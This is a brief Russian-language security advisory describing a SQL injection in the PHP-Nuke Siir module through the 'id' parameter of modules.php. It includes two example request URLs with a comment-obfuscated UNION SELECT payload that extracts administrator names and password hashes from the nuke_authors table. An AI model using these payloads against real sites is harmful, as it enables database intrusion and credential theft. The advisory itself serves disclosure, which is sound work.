Программа: PHP-Nuke Module Siir

Уязвимость позволяет удаленному пользователю выполнить произвольные SQL команды в базе данных приложения. Уязвимость существует из-за недостаточной обработки входных данных в параметре «id» сценарием modules.php. Удаленный пользователь может с помощью специально сформированного запроса выполнить произвольные SQL команды в базе данных приложения.

Пример:

modules.php?name=Siir&op=print&id=-9999999%2F%2A%2A%2Funion%2F%2A%2A% 2Fselect/**/0,aid,pwd,pwd,4/**/from+nuke_authors/*where%20admin%201%200%202

http://xxxx/modules.php?name=(xxx subject)&(subject)=print&id=-9999999%2F%2A%2A%2Funion%2F%2A%2A%2F select/**/0,aid,0x3a,pwd,4/**/from+nuke_authors/*where%20admin%201%200%202



Оставить мнение